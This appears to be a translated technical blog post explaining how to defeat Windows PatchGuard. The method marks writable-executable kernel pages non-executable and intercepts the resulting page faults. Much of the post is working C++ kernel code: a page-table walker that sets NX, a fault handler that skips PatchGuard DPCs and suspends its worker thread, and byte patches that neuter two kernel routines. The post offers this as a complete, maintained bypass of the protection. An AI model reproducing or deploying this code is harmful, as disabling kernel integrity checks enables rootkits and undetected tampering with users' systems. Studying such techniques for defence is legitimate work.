[Translation] Defeating Patchguard by Hooking Page Fault

Posted: 2024-12-16 17:17

nice667

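There is already plenty of excellent research on Patchguard; Tetrane has even published a 61-page whitepaper covering all of its intricacies. The method presented here differs in that it does not actually rely on how Patchguard works, but on a very obvious principle of memory management. The advantage of this approach is that it does not aim to defeat one specific version of Patchguard, but the entire concept of it. I admit I have been mulling this over for a while, but I think it is time to share it with the world, after nearly 7 years during which I only had to change a single line of code to keep it up to date (KiSwInterruptDispatch).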

1: A Stark Contrast

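To find a way to defeat Patchguard, we only need to know one thing about it: it runs from non-image pages and decrypts itself on the fly.

Once you know that, you can see where this is going, because the Windows kernel, like any other modern operating system, absolutely hates RWX memory in Ring 0! It is a security nightmare, after all, and Microsoft will not sign your driver if it contains an RWX section. This is a case of "do as I say, not as I do". Fun!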

2: System VA Types

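Before we design a solution that takes advantage of this contradiction, we should learn one more thing about our beloved operating system: how it likes to arrange memory. Let's play a little game. Launch Process Hacker, or any other tool that shows the image bases of kernel drivers, pick a (non-session) driver and check its image base. Does it start with something close to 0xfffff803?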

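Admittedly, this is not the best party trick, but the point is that the kernel manages each "type" of memory under a different PXI (PML4/PML5 index). You can see how this all works by looking at the enum _MI_SYSTEM_VA_TYPE; MiVisibleState holds a neat little array named SystemVaType that maps the upper 256 PXIs to a specific type of memory. This means that when you allocate a page, where it ends up is not truly random, even though the layout is slightly randomized on every boot.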
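To make the PXI idea concrete, here is a minimal sketch of how a PML4 index is derived from a virtual address, assuming 4-level paging (48-bit virtual addresses). The helper names `pml4_index` and `is_upper_half_index` are hypothetical and do not appear in the original code.

```cpp
#include <cstdint>

// Hypothetical helper (not from the original article): extracts the PML4
// index, i.e. bits 47..39 of a virtual address under 4-level paging.
constexpr std::uint64_t pml4_index(std::uint64_t va) {
    return (va >> 39) & 0x1ff;
}

// Kernel-half addresses fall into the upper 256 entries (0x100..0x1ff).
constexpr bool is_upper_half_index(std::uint64_t index) {
    return index >= 0x100 && index < 0x200;
}

// A driver image base starting with 0xfffff803 sits under index 0x1f0.
static_assert(pml4_index(0xfffff80300000000ull) == 0x1f0, "driver image example");
static_assert(is_upper_half_index(pml4_index(0xfffff80300000000ull)), "kernel half");
// A typical user-mode address stays in the lower 256 entries.
static_assert(pml4_index(0x00007ff700000000ull) == 0xff, "user-mode example");
```

Every address that shares the same top-level index is backed by the same PML4 entry, which is why the memory type can be looked up per index rather than per page.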

To give you an idea of the individual memory regions, here is a snippet of the enum:

namespace mi
{
    // [enum _MI_SYSTEM_VA_TYPE]
    //  Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
    //
    enum class system_va_type_t : int32_t       
    {                                           
        unused =                        0x0,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        session_space =                 0x1,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        process_space =                 0x2,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        boot_loaded =                   0x3,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        pfn_database =                  0x4,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        non_paged_pool =                0x5,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        paged_pool =                    0x6,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        special_pool_paged =            0x7,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        system_cache =                  0x8,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        system_ptes =                   0x9,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        hal =                           0xa,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        formerly_session_global_space = 0xb,      // Windows 11
        session_global_space =          0xb,      // Windows 10 v1607, Windows 10 v2004, Windows 10 v20H2
        driver_images =                 0xc,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        special_pool_non_paged =        0xd,      // Windows 10 v1607
        system_ptes_large =             0xd,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        kernel_stacks =                 0xe,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        //maximum_type =                0xe,      // Windows 10 v1607
        secure_non_paged_pool =         0xf,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        //system_ptes_large =           0xf,      // Windows 10 v1607
        kernel_shadow_stacks =          0x10,     // Windows 11
        maximum_type =                  0x10,     // Windows 10 v2004, Windows 10 v20H2
        kasan =                         0x11,     // Windows 11
        //maximum_type =                0x12,     // Windows 11
    };                                          
};

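This means that if we exclude the pages used for actual kernel images and filter for RWX memory, we end up with a very small subset of allocations, most likely Patchguard or some rootkit that unfortunately lives on your system.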

3: How to Enumerate

scheduler::call_ipi( [ & ] ( auto barrier ) {
  barrier->up();
 
  // Determine the range we scan.
  //
  auto [range_min, range_max] = get_range( range_per_cpu );
 
  // Iterate all top-level page table entries in kernel address space.
  //
  for ( size_t ipxe = 256; ipxe != 512; ipxe++ ) {
    // If ignored region, skip.
    //
    if ( mem::get_pxi_flags( ipxe ) & ignored_pxi_flags )
      continue;
 
    auto rec = [ & ] <auto N> ( auto&& self, uint64_t va, const_tag<N>, size_t imin, size_t imax )
    {
      auto pte = mem::get_pte( va, N );
 
      // Skip if not present.
      //
      if ( !pte->present )
        return;
       
      // If we did not reach the bottom level:
      //
      if constexpr ( N != 0 ) {
        // If directory:
        //
        if ( !pte->large_page ) {
          // Iterate all pt entries:
          //
          for ( size_t ipte = imin; ipte != imax; ipte++ )
            self( self, va | ( ipte << ( 12 + 9 * ( N - 1 ) ) ), const_tag<N - 1>{}, 0, 512 );
          return;
        }
        // If large page, skip if too large to be considered.
        //
        else if constexpr ( N > 1 ) {
          return;
        }
        // Fallthrough to page handling.
      }
 
      // Skip if not RWX.
      //
      if ( !pte->write || pte->execute_disable )
        return;
 
      // Skip if user-mode memory mapped to kernel.
      //
      if ( !is_kernel_va( mem::get_virtual_address( pte->page_frame_number << 12 ), true ) )
        return;
 
      // Disable execution.
      //
      atomic_bit_set( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
    };
    rec( rec, mem::make_cannonical( ipxe << ( mem::va_bits - 9 ) ), const_tag<mem::page_table_depth - 1>{}, range_min, range_max );
  }
 
  // Flush the TLB and return.
  //
  barrier->down();
  ia32::flush_tlb();
} );

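This code more or less boils down to:

Start an IPI, since we do not want to race against the rest of the operating system.
Iterate all kernel pages (indices 0x100 through 0x1ff).
Skip the regions that cannot contain Patchguard. I recommend skipping SessionSpace, ProcessSpace, DriverImages, PagedPool and, most importantly, the self-referencing index, unless you want a triple fault.
Skip pages that are non-executable, non-writable, or not present.
Go ahead and flip the NX bit, so the page is no longer executable.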
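The filter in the last two steps comes down to three architectural bits of an x86-64 page table entry. The sketch below works on raw 64-bit entry values only and touches no real page tables; the helper names (`is_rwx`, `with_nx`, `pml4_base`) are hypothetical, and 4-level paging is assumed for the address calculation.

```cpp
#include <cstdint>

// Architectural x86-64 page table entry bits.
constexpr std::uint64_t pte_present = 1ull << 0;   // P
constexpr std::uint64_t pte_write   = 1ull << 1;   // R/W
constexpr std::uint64_t pte_nx      = 1ull << 63;  // XD / NX

// Hypothetical helper: true when a raw entry is present, writable and executable.
constexpr bool is_rwx(std::uint64_t pte) {
    return (pte & pte_present) != 0 && (pte & pte_write) != 0 && (pte & pte_nx) == 0;
}

// Hypothetical helper: the same entry value with execute-disable set.
constexpr std::uint64_t with_nx(std::uint64_t pte) {
    return pte | pte_nx;
}

// Hypothetical helper: lowest canonical address covered by a PML4 index,
// assuming 48-bit virtual addresses (bits 63..48 copy bit 47).
constexpr std::uint64_t pml4_base(std::uint64_t index) {
    return (index << 39) | (index >= 0x100 ? 0xffff000000000000ull : 0ull);
}

static_assert(is_rwx(0x63), "present + writable + executable");
static_assert(!is_rwx(0x61), "read-only entries are skipped");
static_assert(!is_rwx(with_nx(0x63)), "NX set means no longer RWX");
static_assert(pml4_base(0x100) == 0xffff800000000000ull, "first kernel index");
```

Once NX is set on such an entry, the next instruction fetch from that page raises a page fault instead of executing, which is exactly the behavior the enumeration relies on.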

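If all goes well, you will get a blue screen with ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY within two or three minutes, at the moment Patchguard decrypts itself and tries to run. Isn't that great?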

4: How to Fix It and Kill Patchguard

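We now need to hook #PF. Remember, Patchguard is no longer in the picture, so our job is very simple. You can swap the IDT and add your own page fault handler or inline-hook MmAccessFault; pick whichever method you prefer, as long as you do it quickly and before our IPI.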

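The final step is very simple, even if you know nothing about how Patchguard works. Just let it blue screen a few times and look at the dumps! You will notice several DPCs, all of which begin with an XOR instruction, and a worker running at PASSIVE_LEVEL. We will suspend the worker forever, and the DPCs will simply return to their caller without doing anything.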

That is pretty much it. The entire source code boils down to roughly 200 lines, and there is no more Patchguard.

static constexpr bool pgc_debug = is_debug_build() && true;
static constexpr bool pgc_disable_timer_dispatch = true;
static constexpr bool pgc_disable_dpc_dispatch =   true;
static constexpr bool pgc_disable_context_dpc =    true;
static constexpr auto ignored_pxi_flags = mem::va_image | mem::va_session | mem::va_process | mem::va_self_ref | mem::va_paged;
inline static bool is_va_ignored( any_ptr virtual_address ) { return mem::lookup_va_flags( virtual_address ) & ignored_pxi_flags; }
 
// The ISR handling Kernel-mode NX faults:
bool on_knx_fault( void* virtual_address, nt::trapframe* tf ) {
  // If ignored region, skip.
  //
  if ( is_va_ignored( virtual_address ) )
    return false;
 
  // Get IRQL, display details.
  //
  auto* stack = ( void** ) ( tf->rsp & ~7ull );
  irql_t irql = ia32::get_effective_irql( tf->rflags );
  if constexpr ( pgc_debug ) {
    log( "KNX Caught @ %p\n", tf->rip );
    log( "RSP:  %p\n", tf->rsp );
    log( "RAX:  %p\n", tf->rax );
    log( "RCX:  %p\n", tf->rcx );
    log( "RDX:  %p\n", tf->rdx );
    log( "RBX:  %p\n", tf->rbx );
    log( "RBP:  %p\n", tf->rbp );
    log( "R8:   %p\n", tf->r8 );
    log( "R9:   %p\n", tf->r9 );
    log( "R10:  %p\n", tf->r10 );
    log( "R11:  %p\n", tf->r11 );
    log( "IRQL: %d\n", irql );
    for ( uint64_t p = tf->rip; p < ( tf->rip + 32 ); ) {
      if ( !mem::is_address_valid( p ) || !mem::is_address_valid( p + 15 ) ) {
        break;
      }
      auto ins = xed::decode64( ( void* ) p );
      if ( !ins ) break;
      log( "%p: %s\n", p, ins->to_string() );
      p += ins->length();
    }
  }
 
  // Dispatch level or IPI level PatchGuard components:
  //
  if ( irql >= DISPATCH_LEVEL ) {
    uint8_t* bytes = ( uint8_t* ) tf->rip;
 
    // KiDpcDispatch/CmpAppendDllSection clone called from dummy DPCs, decrypts and calls into pg context.
    //
    if ( pgc_disable_context_dpc && !memcmp( bytes, "\x2E\x48\x31", 3 ) ) {
      if ( !mem::is_cannonical( tf->rdx ) ) {
        if ( tf->rcx == tf->rip ) {
          if constexpr ( pgc_debug )
            log( "Discarded CmpAppendDllSection DPC: %llx\n", tf->rip );
          tf->rip = *( uint64_t* ) tf->rsp;
          tf->rsp += 8;
          return true;
        }
      }
    } 
    else if ( pgc_disable_dpc_dispatch && !memcmp( bytes, "\x48\x31", 2 ) ) {
      if ( !mem::is_cannonical( tf->rdx ) ) {
        if ( ( tf->rip - 0x70 ) <= tf->rcx && tf->rcx <= ( tf->rip + 0x70 ) ) {
          if constexpr ( pgc_debug )
            log( "Discarded KiDpcDispatch DPC: %llx\n", tf->rip );
          tf->rip = *( uint64_t* ) tf->rsp;
          tf->rsp += 8;
          return true;
        }
      }
    }
 
    // KiTimerDispatch clone called from KiExecuteAllDpcs, decrypts and calls into pg context.
    //
    if constexpr ( pgc_disable_timer_dispatch ) {
      for ( int i = 0; i < 0x20; i++ ) {
        // pushfq
        if ( bytes[ i + 0 ] == 0x48 && bytes[ i + 1 ] == 0x9C ) {
          for ( int j = i; j < 0x20; j++ ) {
            // sub rsp
            if ( bytes[ j + 0 ] == 0x48 && bytes[ j + 1 ] == 0x83 ) {
              if constexpr ( pgc_debug )
                log( "Discarded KiTimerDispatch: %llx\n", tf->rip );
              tf->rip = *( uint64_t* ) tf->rsp;
              tf->rsp += 8;
              return true;
            }
          }
        }
      }
    }
  } else if ( ke::get_eprocess() == ntpp::get_initial_system_process() ) {
    // Deferred work item?
    //
    uint64_t last_valid_vpn = 0;
    for ( int i = 0; i < 0x20; i++ ) {
      // Validate stack pointer.
      //
      auto* value_ptr = &stack[ i ];
      if ( auto vpn = uint64_t( value_ptr ) >> 12; vpn != last_valid_vpn ) {
        if ( !mem::is_address_valid( value_ptr ) ) {
          break;
        }
        last_valid_vpn = vpn;
      }
 
      // Check if it matches the value we expected.
      //
      void* value = *value_ptr;
      if ( value != &ke::delay_execution_thread && value != &ke::wait_for_multiple_objects && value != &ke::wait_for_single_object ) {
        continue;
      }
 
      // Align stack
      tf->rsp &= ~0xF;
      // Set the arguments on stack
      tf->rcx = ( uint64_t ) nt::mode_t::kernel_mode;
      tf->rdx = false;
      *( int64_t* ) ( tf->r8 = ( tf->rsp + 0x28 ) ) = -0x11F0231A4F3000;
      // Simulate call [KeDelayExecutionThread]
      tf->rsp -= 8;
      *( uint64_t* ) tf->rsp = tf->rip;
      tf->rip = ( uint64_t ) &ke::delay_execution_thread;
     
      // Lower IRQL and return.
      //
      if constexpr ( pgc_debug )
        log( "Suspended PatchGuard worker thread: %llx\n", ntpp::get_client_id().unique_thread );
      ia32::set_irql( APC_LEVEL );
      tf->rflags.interrupt_enable_flag = true;
      return true;
    }
  }
 
  // False positive, fix NX and continue.
  //
  auto [pte, _] = mem::lookup_pte( virtual_address );
  atomic_bit_reset( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
  return true;
}
 
 
// Initializes the patchguard bypass.
//
void init() {
  // Fetch the number of processors and distribute the work.
  //
  static const uint16_t num_processors = ( uint16_t ) apic::number_of_processors();
  static const uint16_t range_per_cpu = 512 / num_processors;
  static constexpr auto get_range = [ ] ( uint16_t range_per_cpu ) -> std::pair<uint16_t, uint16_t> {
    // [ idx*R, (idx+1)*R ]
    uint16_t rmin = uint16_t( ia32::read_pcid() ) * range_per_cpu;
    uint16_t rmax = rmin + range_per_cpu;
     
    // If last range, round to max.
    if ( ( rmax + range_per_cpu ) >= 512 )
      rmax = 512;
     
    return { rmin, rmax };
  };
   
  // Add the patches and call the IPI.
  //
  if ( sdk::exists( ki::sw_interrupt_dispatch ) )
    hook::patch( &ki::sw_interrupt_dispatch, { 0xC3 } );
  if ( sdk::exists( ki::mca_deferred_recovery_service ) )
    hook::patch( &ki::mca_deferred_recovery_service, { 0xC3 } );
  scheduler::call_ipi( [ & ] ( auto barrier ) {
    // .... See above
  } );
}
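The work distribution in init() splits the 512 entries of a page table into one slice per processor. As a purely arithmetic illustration, here is a variant in which only the last processor absorbs the remainder. The type `index_range` and the function `split_range` are hypothetical names, and the sketch assumes a zero-based processor index and a processor count between 1 and 512.

```cpp
#include <cstdint>

// Hypothetical type: half-open range [min, max) of page table indices.
struct index_range {
    std::uint16_t min;
    std::uint16_t max;
};

// Hypothetical helper: slice of the 512 indices handled by processor `cpu`
// out of `count` processors. Assumes 0 <= cpu < count and 1 <= count <= 512.
// Every slice has 512 / count entries; the last one also takes the remainder.
constexpr index_range split_range(std::uint16_t cpu, std::uint16_t count) {
    return index_range{
        static_cast<std::uint16_t>(cpu * (512 / count)),
        static_cast<std::uint16_t>(cpu + 1 == count ? 512 : (cpu + 1) * (512 / count))
    };
}

// Four processors: 128 entries each, no overlap.
static_assert(split_range(0, 4).min == 0 && split_range(0, 4).max == 128, "cpu 0 of 4");
static_assert(split_range(3, 4).min == 384 && split_range(3, 4).max == 512, "cpu 3 of 4");
// Three processors: 170 entries each, the last one also covers 510 and 511.
static_assert(split_range(2, 3).min == 340 && split_range(2, 3).max == 512, "cpu 2 of 3");
```

Keeping the ranges half-open means adjacent slices share a boundary value without scanning any index twice.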